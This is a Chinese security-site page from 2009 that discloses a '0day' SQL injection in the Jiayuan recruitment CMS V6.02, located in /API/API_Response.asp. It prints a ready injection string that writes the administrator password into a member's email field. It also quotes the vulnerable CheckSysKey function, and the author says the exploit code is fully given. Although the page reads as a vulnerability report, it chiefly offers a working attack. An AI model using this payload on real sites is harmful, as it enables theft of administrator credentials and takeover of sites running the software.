首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
嘉缘人才cms系统最后一个注射漏洞?(0day)
来源:http://www.hacker.com.cn 作者:幻泉 发布时间:2009-08-10  

漏洞作者:幻泉[B.S.N]
漏洞来源: http://www.hacker.com.cn
源码下载: 自己动手丰衣足食。
程序版本:嘉缘人才CMS系统V6.02(本人只测试了6.02,老版本大家自己测试吧。)
漏洞等级:高
漏洞说明:
/API/API_Response.asp

由于对ip没做过滤进行update操作导致出现注射漏洞。
如果access限制比较多。但是可以利用一下代码测试。

Code:
',Member_email=dFirst('JOB_pass','JOB_admin'),Member_url='aaa

这样就更新密码到email里了。

分析这个漏洞还需要对以下代码分析。

Code:
Function CheckSysKey(iName, iSysKey) ' username=huanquan   syskey
    If IsNull(iName) Or iName = "" Or IsNull(iSysKey) Or iSysKey = "" Then '如果都是空则结束调用
        CheckSysKey = False
        Exit Function
    End If
    If Len(iSysKey) = 32 Then '如果syskey长度是32则获取9-16位
        iSysKey = Mid(iSysKey, 9, 16)
    End If
    Dim strFRKey, strFRKeyNew
    strFRKey = Md5(iName&API_SysKey,16)   'baf588a6ba715854
    strFRKeyNew = Md5(iName&API_SysKey,16) 'baf588a6ba715854
    If LCase(iSysKey) = LCase(strFRKey) Or LCase(iSysKey) = LCase(strFRKeyNew) Then
        CheckSysKey = True
    Else
        CheckSysKey = False
    End If


我只介绍大概,漏洞利用代码都给了,大家可以自己看他的程序。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Dedecms多个鸡肋漏洞分析
·Dedecms爆路径漏洞
·各大游戏高危漏洞(魔兽争霸、反
·国外一Blog程序0day
·WordPress 2.8.3高危漏洞
·MS09-044:远程桌面连接中的允许
·ESCMS 0DAY
·Overwrite $_FILE array in rfc1
·四通政府CMS管理系统的union注入
·dedecms注入漏洞 影响版本5.3 –
·Discuz!NT 2.5(20080826更新前
·嘉缘人才系统漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved